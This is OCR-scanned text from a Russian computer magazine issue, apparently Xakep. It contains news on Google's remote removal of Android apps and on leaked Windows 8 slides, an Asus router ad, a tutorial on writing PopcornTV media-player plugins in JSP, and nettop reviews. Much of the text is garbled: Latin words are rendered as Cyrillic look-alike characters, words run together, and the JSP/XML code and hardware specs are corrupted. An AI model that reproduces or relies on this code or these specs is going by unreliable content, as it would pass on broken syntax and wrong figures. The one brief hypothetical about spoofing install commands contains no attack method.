А вернее, протестить возможностьудаленного удаления приложения 
со смартфонов пользователей. Короче говоря, всем смартфонам была 
отправлена команда: «Удалить, нельзя помиловать». Пользователям 
при этом было отображено уведомление, но кто ж их читает? Само собой, 
такая возможность прописана в правилах использования ОС. Но читать 
лицензии скучно, а вот что действительно интересно, так это то, как 
работаеттехнология. 

На самом деле, операционная система АпсІгоісІ уже давно поддерживает 
две команды: НЕМ0ѴЕ_А55ЕТ и 1М5ТАРР_А55ЕТ, которые позволяют 
Соодіе не только удаленно удалять, но и устанавливать приложения. 
Твой девайс на АпсІгоісІ поддерживает постоянное ТС Р/55 Р/ХМ РР-со- 
единение с серверами СТаІк (да-да, того самого чата, что используется 
в Стар) все время, когда утелефона есть доступ в интернет. Причем 



мобильная ОС автоматически переподключается ксерверу в случае 
обрыва связи и постоянно отправляет пинги на сервера Соодіе. Этот 
канал связи позволяет Соодіе отправлять системные сообщения твоему 
девайсу. Отправленное через СТаІкСегѵісе сообщение непременно 
попадает на каждый смартфон. Кактолько Соодіе отдает команду 
1М5ТАРР_А55ЕТ, получивший сообщение смартфон на АпсІгоісІ скачи- 
вает АРК-дистрибутив с программой и инсталлирует ее. И, наоборот, 
получив команду РЕМ0ѴЕ_А55ЕТ, система удаляет приложение, если 
оноустановлено. Такая возможность, с одной стороны, хороша: Соодіе 
может оперативно удалить всю появляющуюся малварь. Но с другой сто- 
роны, а что, если кто-то сможет реализовать МІТМ-атаку на 55Р-соеди- 
нение конкретного телефона до СТаІкСегѵісе и проспуфить сообщение 
1М5ТАРР_А55ЕТ, чтобы залить на телефон какую-нибудь заразу? Или 
вообще добраться до самих серверов СТаІкСегѵісе и отправить команду 
всем сразу? Вот где будетжесть! 



Мо(іЛса1іоп5 



А ТѵѵіІііИІ ЕсІір$е Ргеѵіеѵѵ 

КетоѵесІ Ггот уоиг рііопе. 5:40 РМ 



А Коо(5(гар 

КепгюѵесІ Ггот уоиг рііопе. 5:40 РМ 



соппесГіоп: 

ИеагГЬеаГ: 48 / 25% / 0% 
Іо§іп: 80 / 42% / 75% 
сІаГа те$$а§е: 
ІМ5ТАІЩА55ЕТ: 1 / 0% / 3% 
КЕМОѴЕ_А55ЕТ: 2 / 1 % / 3% 
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МЕ6АЫЕѴѴ5 



НЕОБЫЧНАЯ ТАБЛЕТКА ОТ АЗУЗ 



Планшетных ПКна рынке ста- 
новится все больше и больше, а 
уж выход іРаб и вовсе произвел 
настоящий фурор. А как известно, 
чем сильнее на рынке конкурен- 
ция, тем ниже цены, итем больше 
шансов, что компании начнут 
выпускать необычные и интересные 
девайсы, желая привлечь поку- 
пателей. Тайваньская компания 
Азизтрадиционно держит руку на 
пульсе — на выставке Сотриіех 
Азиз был представлен гаджет А5У5 



Еее ТаЫеб который даже нельзя 
назвать планшетником в обычном 
понимании этого слова. ЕееТаЫеІ; 
— это, скорее, цифровой блокнот, 
построенный на ТЕТ-матрице с 64 
градациями серого. Здесь нет даже 
подсветки, зато есть 8-дюймовый 
дисплей с разрешением 1024x768, 
тачскрин чувствительностью 2450 
брі, и страницы листаются со ско- 
ростью 0.1 сек. Время автономной 
работы устройства равно примерно 
10 часам. Еее Та Ыеі: оснащается 




слотом тісгоЗО, 2-мегапиксель- 
ной камерой, 3,5 мм выходом на 
наушники (имеется встроенный 
медиаплеер), и, конечно, стилусом, 
который сильно напоминаетперья 
от п л а н ш ето в ѴѴа со т . 

Приятно радуети анонсирован- 
ная цена устройства — Еее 
ТаЫеІ; обещают выпустить 
в продажу осенью по 
цене 1 99-299 мертвых 
президентов. 



ТѴѴІТТЕК.С0М/КЯЕМиМЯиЗЗІА 




в России нашлось 40 тысяч человек, которые пользуются Твиттером и решили 
почитать, что в нем будет писать наш продвинутый президент. Первый же твит 
с ошибкой: «Всем привет! Я в Твиттере и это моеб первое сообщение!», зато 
оставленный в офисе самого Тѵѵіиег’а. Посещение высокотехнологичных ком- 
паний (а Медведев побывал еще и в Арріе и Сізсо) состоялось во время поездки 
президента в Кремниевую долину. Причина понятна: раз уж собрались строить 
нашу собственную ЗШсоп ѴаКеу в подмосковном Сколково, то надо хотя бы понять, 
на кого равняться. Обидно же будет, если бюджетуйдет, условия для отмывания 
денег будут созданы, а ни одного достойного стартапа не появится. Инициа- 
тива правильная. Уважаемый Дмитрий Анатольевич, вы обращайтесь к нам за 
помощью. Мы и сами советом поможем, и ребят молодых посоветуем. Атам, того 
и гляди, автоматизируем поликлиники, и электронное правительство заработает. 
Наши читатели очень способные! 



128 Гб - НОВЫЙ рекорд в области производства флеш-памяти, установленный 
компанией ТозЫЬа 



ЧЕРЕЗ ТРИ ГОДАВІОЗ 
НЕ БУДЕТ 




Любопытными соображениями поделился с миром крупнейший производитель 
материнских плат Місгоз1;аг(М5І). По мнению представителей «железного» гиганта, 
ВІ05 на современных компьютерах — это атавизм, который скоро должен раствориться 
в анналах истории. Замену ста рому доброму В І05 микростаровцы видят в У ЕЕ! -загруз- 
чиках, которые сама М5І начала продвигать еще в 2008 году, выпустив платы с Сііск 
ВІ05 на борту. НЕЕ! (УпіѵегзаІЕхІепзіЫе Еігтѵѵаге ІпІегГасе, Универсальный Расширяе- 
мый Интерфейсдля Прошивок) — дальнейшее развитие проекта Іпіеі под названием 
ЕЕ!, который был предназначен для того, чтобы наделить ВІ05 дружественным для 
пользователя интерфейсом, а также решить многиедругие проблемы, типичныедля 
ПК. Собственно, первые материнские платы с УЕЕ! будугоснованы на чипсете Запсіу 
Вгісідеотіпіеіи выпущены во всех категориях: от бюджетных до Ыдб-епсІ. Платы будут 
выпущены в конце этого года и в начале 201 1 . Переход на СЕР! становится куда более 
важным, таккакэто открывает новые возможности для хранения данных. Нетакдавно 
компания Зеадаіеофициальнозаявила, что УЕЕ! — важное требование длятого, чтобы 
загрузить ПКс диска размером более2Тб. Основная разница между ВІОЗи УЕЕ! втом, 
что первый написан на ассемблере, а второй на С. Но перейти на него, отказавшисьот 
ВІОЗ’а, нетакпросто. Большинство встроенных ВОМ довольно маловместительны, так 
что обычные материнки нельзя просто перепрошить на СЕР!, который занимает больше 
места. Ктомуже,те многочисленные фишки для биоса вроде ЕхргеззОаІе от Азиз, 
позволяющего загрузить простенькую ОС через пару секунд после запуска компьютера, 
придется переписыватьзаново! 



► 014 
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УТЕЧКА секретной ИНФОРМАЦИИ О ѴѴШООѴѴЗ 8 



Итальянские журналисты с портала ѵѵѵѵѵѵ.ѵѵіпсіоѵѵзеііе.сопп каким-то 
немыслимым образом сумели раздобыть секретные слайды Місгозо!"!:, 
предназначенные для внутреннего использования. Но самое главное — 
в презентации приведена информация о планах МісгозоІІ по разработке 
ѴѴіпсІоѵѵзВ. Большинство информации — это маркетинговая лабуда об 
изменении бренда и приближения кподходуАрр1е«Это просто рабо- 
тает». Однако некоторые детали о некоторыхтехнических новшествах 
все-таки есть: 

1 . Простое восстановление системы. В ѴѴіпсІоѵѵз появится инструмент 
ѴѴіпсІоѵѵз Весоѵегу, позволяющий быстро откатить недавние изменения, 
если пользователь что-то напортачил. Более того, появится возмож- 
ность «Везеі: ѴѴіпсІоѵѵз, Ьиі; кеер тузіиіі», которая позволит быстро 
переустановить саму винду, при этом оставит без изменений документы, 
персональные данные, профайлы пользователей. Вероятно, появится 

и долгожданный магазин приложений Арр Біоге. Сразу после переуста- 
новки системы можно будет быстро за и нетал лить все ранее купленные 
проги. 

2. Быстрая загрузка ѴѴіпсІоѵѵз. Вот и Міегозоб;, наконец-то, заметил, что 
винда грузится до неприличия долго. Это по нынешним-то меркам. 
Вместо обычной текущей схемы процесса загрузки компьютера, состоя- 
щего из Р05Т (часть, которую грузит материнская плата), инициализа- 
ции системы (драйверы, сервисы) и загрузки пользовательской сессии 
предлагается ввести комбинированный вариант загрузки —«109011 + 
НіЬегпаІе Вооі:». Общий смысл втом, чтобы не выключать компьютер 
полностью, а постоянно использовать особый вид гибернации, которая 



будет кэшировать большую часть элементов системы и быстро загру- 
жать ее. 

3. Новые системы авторизации. Одной изживыхи понятныхопций, 
вероятно, вставленных в слайды для каких-нибудь не сильнотехничес- 
ких менеджеров, является визуальная авторизация. К моменту выпуска 
ѴѴіпсІоѵѵзЗ, а он планируется не ранее, чем через два года, большинство 
компьютеров и ноутбуков непременно будутоснащены веб-камерой. 
Нужно заглянуть в камеру— и программа залогиниттебя всистему. Пффф. 
Это уже не замашки по поводу интеллектуальной 00 ѴѴіпРЭ, атак, пустячок, 
которыйуже сейчас можно реализоватьс помощью дополнительно ПО. Но 
тутопятьже напоминаю: никто не гарантирует, что эти слайды — не фейк. 



^іпсіоѵѵз Кесоѵегу 

СНоо$е а роіпі іп Ііте Іо ге^игп уоиг сотриіег Іо 
■ • • илсіо гесет сНапдез опіу 



Кѳ5еі ѴѴіпсіо\лг5, Ьиі кеер ту $1и^1 



( СапсеІ ) 






Іпзрігіпд Іппоѵаііоп • Регвібіепі Реі^есііоп 



ІШПШМІ 

его беспроводного комфорта 



2 Комфортная скорость для всех приложений! 
Графическая настройка приоритетов 

Удобное перераспределение ширины канала между такими приложениями, 
как голосовые программы, игры, приложения, использующие потоки аудио 
и видео, а также РТР и Р2Р 



Не требует специальных знаний! 

Быстрая настройка беспроводной сети и Іпіегпеі 

Утилита АЗиЗ Е23еШр/ ѴѴРЗ ѴѴііагсІ - настройка защищенной беспроводной сети 
и Iп^е^пе^соединения за 2 минуты с предустановками для провайдеров более 
чем в 100 городах России 










т ІГ- 
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Универсальность и функциональность! 
Подключение Ц$В устройств 

АЗиЗ Е2 Рііе Зііагіпд - личный сетевой файл-сервер с доступом через Іпіегпеі 
АЗиЗ Е2 Ргіпіег Зііагіпд - принт-сервер для поддержки одновременной печати 
и сканирования 






ѵѵѵѵш.а$и$.ги 



Гарантия 2 года 



Горячая линия: 8-800-100-2787 
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КТ-МІЗП 

Многофункциональный 
беспроводной 
маршрутизатор 802.11 N 



Товар сертифицирован, на правах рекламы. 







РЕРким 



I Дмитрий Ленский 







[ИНГ попкорна 



Учимся создавать плагины для медиаплееров 
РорсогпТѴ 



Иметь отдельный девайс для проиг- 
рывания НО-видео - отличная идея. 
Во-первых, отпадает всякая необходи- 
мость размещать компьютер рядом 
с телевизором и включать его каждый 
раз, как захочется посмотреть новый 
фильм. А во-вторых, современные 
НВ-плееры являются весьма функцио- 
нальными устройствами и способны 
здорово облегчить жизнь. 




Например, практически любой полноценный НО-плеерлибо поумолчанию, 
либо после установки кастомной прошивки способен качать торренты, 
работать с сетевыми ресурсами, показывать видео сУоиІиЬе и т.д. У плееров 
РорсогпТѴ есть дополнительная крутая возможность, которую оценит 
любой Х-человек— под него можно самостоятельно писать плагины и 
даже свободно размещать их в общедоступном репозитории «МедиаБар». 
Кстати, сейчас компания ВВК проводит конкурс: каждый автор достойного 
приложения получит в подароктелевизор ВВК. Та к что у тебя естьхороший 
шанс нетолько потренироваться в кодинге, но и выиграть себе новый телек. 

Главные тезисы 

Самое главное, что нужно осознать — это то, что по своей сути «плагин» 
является обычным ѵѵеЬ-сайтом, адаптированным подэкрантелевизора. 

На медиаплеере Рорсогп установлен специальный Ыпихна борту и вся ви- 
зуализация «плагинов» осуществляется с помощью встроенного браузера 
БуаЬаз ту і В ох Вгоѵѵзег, который умеет отображать НТМ Б- контент и даже 
обеспечивает базовую (неполную] поддержку С55 и ^аѵа5сгірБ Считать его 
полноценным браузером нельзя: когда я попытался зайти сего помощью 
на Яндекс, девайсушел в нокдаун, и мне помогтолько ребут. Собственно, 
он и не для серфинга: БуаЬаз Вгоѵѵзег предназначен для отображения 
специально созданных под него страничек, которые и располагаются в Ме- 
диаБаре. Сайты-плагины могут разрабатываться с использованием любой 
технологии, будьто РНР, А5Р.МЕТ, РуЖоп, РиЬуили ^5Р. Единственное 
ограничение — клиентская разметка: браузер даже использует собственное 
расширение НТМЕ, дополняющее ста ндартныетеги новыми свойствами. 
Самый простой вариантсоздания «плагина» для РорсогпТѴ выглядиттак: 
создается НТМЕ-файл со ссылками на медиа-источники в интернете, файл 
записывается на флешку, флешка втыкается в «Попкорн», после чего «пла- 
гин» становится доступным с пульта управленИИри ты можешь его запустить, 
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получив возможность переходить по созданным ссылкам. Например, если 
ты задумал сделать приложение для прослушивания Ііѵе-вещания радио- 
станций, код будет при мерно та КИМ: 

<а 1ігеР="]Щ:Цр : //ѵ/ОІ-спОІ . акасіозСгеат. ги : 8000/ 
зі1ѵеггаіп48 .трЗ" аосі>Серебряный Дождь</ахЬг> 

<а 1ігеР='ЪрЦр : / /ЬгоасісазСОЗ . зСаСіоп . ги/сіРт" аосі>ВРМ 
</а> 

Тег«аосІ»тутуказываетнато, что это аудио-источник: аосІ=АисІіоОп ВетапсІ 
(аудио по запросу]. В случае, если ты указываешь на видео- или фото-аль- 
бом, этот те г должен быть«ѵосІ» или «роб» соответственно. 

Путь В репозиторий 

Для разработки приложений, которые хочется разместить в МедиаБаре, 
путь несколько отличается: по сути, тебе нужно сделать сайт, который будет 
генерировать понятную браузеру«Попкорна» НТМЕ-разметку. Используе- 
маятехнология можетбытьлюбой: начиная со статичных НТМЕ-файлов и 
заканчивая любым популярным ѵѵеЬ-фреймворком. МедиаБар работает на 
базетехнологии АрасЬеТотсаІ: — бАѴА-Ьазеб веб-сервера, служащего для 
работы сб5Р-приложениями. 

Для разработки плагинов по этой технологии есть специальный 5ВК, кото- 
рый включает в себя работающий пример «Медиапортала» с несколькими 
плагинами и документацию разработчика. 

Для экспериментов по созданию новых плагинов первым делом необ- 
ходим^установитьнасвой компьютер АрасЬеТотсаБ предварительно 
убедившись в наличии баѵа-машины. Всетребуемые файлы присутствуют 
на нашем ВѴВ, а установка достаточно проста: Іотсаі поставляется в 
виде 2 Ір-архива, который надо просто распаковать, после чего*з а пустить 
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с помощью специального скрипта зіагіир. 
ЬаІввинделибозІагІир.зЬ в*піх. ВѴѴіпсІоѵѵз 
может потребоваться установить переменные 
окружения ^ВЕ_Н0МЕ и ^АVА_НОМЕтак, чтобы 
ониуказывали на путьдо ^аѵа. Послезапуска 
Тотсаі откроет 8080 порт(поумолчанию), на 
котором будет висеть веб-сервер. 

В составе ЗВКесть работающий пример ме- 
диапортала с несколькими плагинами. Чтобы 
запустить его, достаточно перенести папку 
ВООТ изархива сВВКв папкуІоппсаЛѵѵеЬаррз, 
переименовав уже имеющийся там каталог 



приложение, которое будет показывать наши 
хакерские видео-уроки. Приложение будет 
подгружать информацию обуроках изХМЕ- 
файла, формировать «меню» для выбора роли- 
ка и давать ссылку на воспроизведение урока. 
Первым делом зафиксируем формат, в котором 
будем хранить и передавать информацию о 
доступных уроках: 

<?хт1 ѵегзіоп="1 . О" 
епсо(ііпд="иТР-8" ?> 

<ѵі(іео> 



к 



МР1015 



МЕТѴѴОВКЕО но РЬАУЕВ 



РООТ. После этого, обратившись браузером 
по адресу Ы:1:р:/Лоса[Ьо5Е8080, ты увидишь 
тестовое приложение из ВПК, которое можно 
менять и добавлять в него новые плагины. Этим 
мы сейчас и займемся. 

Собственный плагин 

Разработка собственного плагина начинается с 
создания новой папки внутри каталога зегѵісе. 
Затем нужно создать файловую структуру пла- 
гина, состоящую из следующихдиректорий: 

ітаде 

ітаде-12 80x72 О 
раде 

раде-1280х720 

ЩіитЬ 

хті 

Все папки имеют говорящие названия и, 
думаю, понятно, что в них лежит: в ітадез — 
картинки проекта, в раде — верстка, стили и 
само приложение, в іЬитЬ — иконки плагина, в 
хті — данные. 

Обрати внимание, что верстка и графика 
представлены в двух вариантах под разные 
разрешения; это необходимо для поддержки 
различных телевизоров. 

В качестве приме^^^авай сделаем простое 
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<іРет ісі="1" РіРІе="Живой КОР"/> 
<іРет ісі="2" РіРІе="Извлекаем 
конфиг из ТВЬЗ"/> 

</ѵісЗео> 

Этот файл можно сохранить под именем ѵібео. 
хті в папке хті, а можно хранить на удален- 
ном сервере — никакой разницы. 

Идем дальше. Основной файл плагина — 
іпбех.]зр, он будет входной точкой приложе- 
ния. 35Р-файлы представляют собой нечто 
очень похожее на любой шаблонный файл: 
смесь НТМЕ и управляющихтегов. Если ты 
когда-нибудь создавал шаблоны для любой 
системы типа Еазі; Тетріаіе или Эппагіу, то ты 
быстро разберешься — тут все очень похоже. 
Приведу и прокомментирую сокращенный 
пример іпбех.]5р нашего приложения: 

<с:саЦс1і ѵаг="еггог"> 

<с:ітрог1: ѵаг="хт1" 
с1іагЕпсо(ііпд="и1і:Е-8" иг1 = 

'Ъсср : / /сіѵсЗ . хакер . ги/ ѵісіео . хті " / > 
<х:рагзе ѵаг="ѵі(1ео" с1ос = "$ {хті } "/> 
<х:зек ѵаг="ѵіс1еоз" 

зе1еск = "$ѵі(1ео/ /іСет"/> 

</с : саСс1і> 

<с:зеЦ ѵаг="і" ѵа1ие="1"/> 

"*> <х:1огЕас1і зе1есЦ = "$ѵісЗеоз" 
ѵаг31:аЦиз = "з"> 







<Ц(1> 

<х:зеС ѵаг="і(1" 

зе1есЦ="зкгіпд ( @1(1) "/> 

<с : зек ѵаг="иг1" ѵа1ие='Ъккр : //сіѵсі. 

хакер . ги/ѵі(1еосаз1:/$ { ісі} .тр4"/> 
<х:зек ѵаг="кік1е" 

зе1еск="зкгіпд (@кік1е) "/> 

<а 1іге1="$ (игі } " ѵос1> 

<ітд згс='Ъккр : //(Іѵсі. хакер . ги/ 
ітадез/$ { 1(1} ОРВ" Ьог(1ег="0"> 
</а> 

<Ьг /> 

<1і2>$ {кі1:1е}</1і2> 

</к(1> 

<с:і1 кезк="$(і %4 == 0}"> 

</кгхкг> 

</с : І1> 

<с:зек ѵаг="і" ѵа1ие="$ { і+1 } "/> 

</х : 1огЕас1і> 

Как видишь, весь «код» тут представлен в виде 
тегов: смешаны и знакомые тебе НТМЕ-теги, 
и какие-то новые, непонятные. Эти «непонят- 
ные» входят в библиотеку тегов 15ТЕ и отлично 
описаны на любом сайте по Яве. 

Кратко пройдемся по коду и используемым 
15ТЕ-тегам: 

• <с:саІсЬ> обрабатываетисключения. 

• <с:ітрогІ> считывает данные файла в пере- 
менную «хті» — обрати внимание на указание 
правильной кодировки и на то, что файл может 
легко быть размещен на удаленном сервере. 

• <х:рагсе> парситХМЕ-данные. 

• <х:5еІ> получает выборку данных и помеща- 
ет ее в массив данных ѵібеоз. 

• <х:^огЕасЬ> — цикл поХМЕ-данным. 

• <с:іЬ — обычное условие. 

Смысл кода оченьи очень простой: считы- 
вается ХМЕ-файл, выбираются все записи 
«кет» из «ѵібео», и в цикле по ним выводятся 
обложка ролика, название ролика и ссылка на 
проигрывание ролика. Причем через каждые 4 
записи вставляются теги <Лг><1:г> для перехо- 
да на новую строку та блицы. 

Для того, чтобы твой плагин стал доступ- 
ным с главной страницы нашего тестовго 
меди портала в локальном ТотсаЕ нужно 
добавить соответствующую запись в файл 
рогіаі.хті: 

<зегѵісе пате="Хакер" іс1="хакер" 
(1езс="Наскег ' 3 ѵіс1ео'7> 



Результаты 

В результате наших манипуляций мы полу- 
чили приложение, считывающее данные о 
доступных роликах из ХМЕ-файла (возмож- 
но, удаленного), наглядно отображающее 
эти данные и предоставляющее возмож- 
ность проигрывания этих видео. В приве- 
денном коде была опущена вся разметка 
и заголовки 15Р-файла, полная версия 
приложения доступна на ВуВ. ^ 
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Главная фишка неттопов - безусловно, размер. Практически полноценный комп в 
виде коробочки 15x15 см - зто супер! Тем более, что производительность современных 
неттопов заметно выросла, и они отлично подходят для веб-серфинга, редактирования 
документов, воспроизведения мультимедиа-контента, включая НО-видео. Многие 
умельцы используют их даже для хостинга в качестве недорогой альтернативы ѴОЗ, 
размещая собственный девайс на колокейшене. В общем, неттоп - штука клевая. 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Для того, чтобы полно и всесторонне оценить представленные в тесте 
неттопы, мы разработали методику, в которой постаралисьучесть все их 
особенности. На первом месте, конечноже, были разнообразныетес- 
товыеутилиты. Так, общую производительность тестируемыхустройств 
мы проверяли с помощью комплексного бенчмарка РСМагк’05, который 
оцениваетскорость работы всей системы в целом. Крометого, мы запус- 
кали ЗОМагк’ОЗ и ЗОМагк’06 для оценки скорости работы графической 
подсистемы неттопа. Для окончательного решения этого вопроса (все 
когда-нибудь играютна компьютере!) мы проводили и реальный игровой 
тесте помощью РагСгу 2. Не обошлось и безтрадиционныхтестов: 



ЗирегРІ и бенчмарка беекЬепсЬ. Кроме нагрузки на процессор и память 
они интересны еще и тем, что хорошо показывают разницу между двух- 
и одноядерными процессорами ІпІеІАіот. Помимо результатов теста 
на итоговую оценку устройств влияли и другие факторы. Это наличие 
оптического привода, так как несмотря на все возможности интернета и 
внешнихжестких дисков никто не собирается отменять коллекции ОѴО 
и покупкулицензионныхдисков. Обращали мы внимание и неустанов- 
ленную операционную систему, так как неттоп без ОС или с пока что не 
очень привычной ѴѴіпсІоѵѵз 7 готов купить далеко не каждый. Еще один 
критерий, который нами строго оценивался — это шум, издаваемый 
устройством. 



► 018 
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Ч' 



30000! 
ШЕР ЮМ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 




ОС:ѴѴІМООѴѴ5 7НОМЕРКЕМіиМ 
ПЛАТФОРМА; МѴІОІА ЮМ 
ПРОЦЕССОР: ІМТЕЕ АТОМ N230, 1 .6 ГГЦ 
ОЗУ: 2 ГБ 00^2 (МАКСИМУМ 3 ГБ) 

НАКОПИТЕЛИ: НПО 320 ГБ (5400 ОБ./МИН) 

ГРАФИКА: МѴЮІА ЮМ (6ЕЕ0РСЕ 9400) 

ЗВУК: 2-КАНАЛ БНБІЙ РЕАЕТЕК АЕС662 
СЕТЬ: 10/100/1000 МБИТ/С 
РАЗЪЕМЫ: 6Х 05В 2.0, В345. ОѴІ 

КОМПЛЕКТАЦИЯ: ПОДСТАВКА. СИСТЕМА КРЕПЛЕНИЯ МОНИТОРУ. 
АДАПТЕР ПИТАНИЯ 

РАЗМЕРЫ, ММ: 170X1 50X20 



□ □□ 



+ 

Небольшой неттоп от компании со смешным названием 30 Ооо!. Произ- 
водитель решил порвать с прошлым и установил на него новейшую 
операционную систему ѴѴіп О оѵѵз 7 Ноте Ргетіит.такчто еслиты стре- 
мишься ко всему новому, это будетхорошей новостью. Не стоит бояться, 
что малыш ее не потянет, так какой построен на платформе МѴЮІА ЮМ 
и обладает достаточно высокой производительностью, которой хватит 
и для воспроизведения видео НО-качества, и даже для многих вполне 
современных игр. Производительность — это тепловыделение, поэтому 
устройство оснащено вентилятором, но шума от него очень мало. Имеет- 
ся порт ОѴІ. 



АСЕКА8РІКЕКЕѴ0 
Р3600 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

0С:ѴѴІМ00ѴѴ2ѴІ2ТАН0МЕРРЕМіиМ 
ПЛАТФОРМА: МѴЮІА ЮМ 
ПРОЦЕССОР: ІМТЕЕ АТОМ 230, 1 .6 ГГЦ 
ОЗУ:2ГБООР2ІМАКС.4ГБ| 

НАКОПИТЕЛИ: НОО 160 ГБ (5400 ОБ./МИН), КАРД-РИДЕР4-В-1 (50/ 

ЗОНС/ММС/ХО/М5/МЗ РРОІ 

ГРАФИКА: МѴЮІА ЮМ (6ЕР0РСЕ 94001 

ЗВУК: РЕАЕТЕКНІѲНОЕРІМІТІОМАиОІО 7.1 

СЕТЬ: МѴЮІА МЕОРСЕ 10/100/1000 МБИТ/С, ѴѴІ-ЕІ 802. 11 В/е 

РАЗЪЕМЫ: бХОЗВ 2.0, Е5АТА, РТ45, ѴѲАІО-ЗОВІ, НОМІ 

КОМПЛЕКТАЦИЯ: ПОДСТАВКА, СИСТЕМА КРЕПЛЕНИЯ МОНИТОРУ, 

АДАПТЕР ПИТАНИЯ, КЛАВИАТУРА, МБІШЬ 

РАЗМЕРЫ, ММ: 180X180X30 




□ □ 



+ 

Никто не спорит, что покупать в офис компьютер, который подходит для 
домашнего использования — это крайне расточительно. Для него нужно 
специальноеустройство, такое, например, какАСЕН АзрігеНеѵо Н3600. 
Несмотря на небольшие габариты (что для офиса естьтолько плюс) этот 
неттоп построен на платформе ЮМ от МѴЮІА, что обеспечиваетему 
достойную скорость работы. Стоит он недорого, что, опять же, является 
преимуществом, причем нетолько для офиса. На борту (реально сбоку) 
имеется шесть портов С5В, разъемы еЗАТАи НОМІ, а также слот для 
карты памяти. Для связи с внешним миром предусмотрены гигабит- 
ный сетевой и ѴѴі-Еі адаптеры. Мощную (для неттопа, конечно) систему 
охлаждения почти не слышно. 



Авот разъемом НОМІ производительсвое детище неоснастил. Венти- 
лятор необходим, но все-таки, если прислушаться, шум от него есть, да 
и греется данный неттоп довольно существенно. Отсутствие какой-либо 
встроенной беспроводной связи мы считаем существенным недостат- 
ком этой модели. 



Конечно, неттоп этот можно не только в офис ставить. Но дома вместо 
установленного здесь В-БНВ хотелось бы видеть порт ОѴІ , а также 
оптический привод. Неттут и оптического выхода для звука. Еще один 
минус — это подставка, вернее то, как на ней неттоп держится. Свалить 
его можно даже неудачным движением мышки, так что будь осторожнее, 
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► 019 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ОС: НЕТ 

ПЛАТФОРМА: МѴЮІА ЮМ 
ПРОЦЕССОР:1МТЕЕАТОМЗЗО, 1.6ГГЦ 
ОЗУ: 2 ГБ ООР2 (МАКС. 4 ГБ) 

НАКОПИТЕЛИ: НОО320 ГБ (5400 ОБ./МИН), ВО СОМВО 
ГРАФИКА: МѴЮІА ЮМ (ѲЕРОЕСЕ 9400) 

ЗВУК: РЕАЕТЕКНЮНОЕЕІМІТІОМАиОІО 5.1 
СЕТЬ: МѴЮІА МРОРСЕ 10/100/1000 МБИТ/С 
РАЗЪЕМЫ:6ХО2В2.0, Р345,ѴеА(0-2иВ),Н0МІ,5/Р0ІЕ 
КОМПЛЕКТАЦИЯ:АДАПТЕР ПИТАНИЯ, ПОДЛОЖКА ПОД КОРПУС 
РАЗМЕРЫ, ММ: 195X70X186 

■■■■■■■■■□ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ОС:ѴѴІМООѴѴ5 7 НОМЕ РРЕМЮМ 

ПЛАТФОРМА: МѴЮІА ЮМ 
ПРОЦЕССОР: ІМТЕЕ АТОМ 330, 1 .6 ГГЦ 
ОЗУ: 2 ГБ ООР2 (МАКС. 4 ГБ) 

НАКОПИТЕЛИ: Н ВО 250 ГБ (5400 ОБ./МИН), КАРД-РИДЕР (20/ЗОНС/ 
ММС/М5/М5РРО) 

ГРАФИКА: МѴЮІА ЮМ (6ЕР0Р0Е 9400) 

ЗВУК: РЕАЕТЕК НіеН ОЕЕІМІТІОМ АООЮ 5.1 
СЕТЬ: МѴЮІА МРОРСЕ 10/100/1000 МБИТ/С, ѴѴІ-РІ 802.1 1В/С/М 
РАЗЪЕМЫ: 6Х 02В 2.0, Р345, ѴСАІО-ЗОВ), НОМІ, Е-2АТА 
КОМПЛЕКТАЦИЯ: КЛАВИАТУРА, МБІШКА, ПУЛЬТДУ, ПОДСТАВКА, 
СИСТЕМА КРЕПЛЕНИЯ МОНИТОРУ, АДАПТЕР ПИТАНИЯ, АНТЕННА 
РАЗМЕРЫ, ММ: 222X1 78X26.9 



+ 

Если ТЫ являешься счастливым обладателем большой коллекции филь- 
мов, музыки, фотографий, да и всего прочего, записанного на оптические 
диски, и не собираешься отказываться от носителей такого типа, — этот 
нел-оп создан специальнодлятебя. 

Внимание — в него встроен привод Віи-Вау, чем может похвастаться 
далеко не каждый настольный компьютер. Такчто, по сути, перед нами 
готовый и крайне мощный видеоцентр, на что намекают и порты НОМІ и 5/ 
РВІР. Естественно, кстати, что новейший оптический привод работает и со 
старыми СВ/ВѴВ-болванками. 

Для того, чтобы обеспечить А5Воск1ОМ 330-ВВ приемлемую цену, 
производитель пожертвовал комплектом поставки, которого просто 
нет. Нет в этом компьютере и модуля беспроводной связи, что сегод- 
ня выглядит просто моветоном. 

Нет и операционной системы, так что работу придется начать не с 
просмотра любимо го ф ил ьма,асее установки. Да и система охлаж- 
дения шумит довольно ощутимо. 



+ 

Компания А5Н5 остается верна своей политике — выпускать отличные 
устройства, но этот девайс отличается от большинства продуктов вендо- 
ра еще и вполне привлекательной ценой! Неттоп, в силу своих особен- 
ностей, отлично подойдет для домашнего использования. Он тихий, но 
производительный, НО-видео для него — вообще не проблема, да и со 
многими играми он справится. На нем установлена новейшая опера- 
ционная система ѴѴіпсІоѵѵз 7, есть куча различных портов на все случаи 
жизни и модуль беспроводной связи, который поддерживает новейший 
стандартѴѴі-Еі ІЕЕЕ 802.1 1 п. Ну, а самое главное — это пульт дистанцион- 
ного управления, который позволиттебе вообще не вставать с дивана! 

К недостаткам устройства мы отнесли отсутствие встроенного оптичес- 
кого привода, что, в общем-то, помешаеттебе сделать из него мультиме- 
диа-центр. Аза внешний привод придется заплатить совсем не малые 
средства. 



► 020 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

0С:ѴѴІМ00ѴѴ5ХРН0МЕ 
ПЛАТФОРМА: ІМТЕ194565Е 
ПРОЦЕССОР: ІМТЕЕ АТОМ N270, 1 .6 ГГЦ 
03У:1 ГБООР2 

НАКОПИТЕЛИ: НОО 1 60 ГБ (5400 ОБ./МИН) 

ГРАФИКА: ІМТЕЕ 94565Е 
ЗВУК: 2-КАНАЛ БНБІЙ 

СЕТЬ: МѴЮІАМЕОРСЕ 10/100/1000 МБИТ/С, ѴѴІ-ЕІ 802. 11 В/О/М 
РАЗЪЕМЫ: 4Х 05В 2.0, В045. ВѴІ. Е5АТА 
КОМПЛЕКТАЦИЯ: АДАПТЕР ПИТАНИЯ, ПОДСТАВКА 

РАЗМЕРЫ, ММ: 130X1 15X39 

■■■■■■□□□□ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ОС: НЕТ 

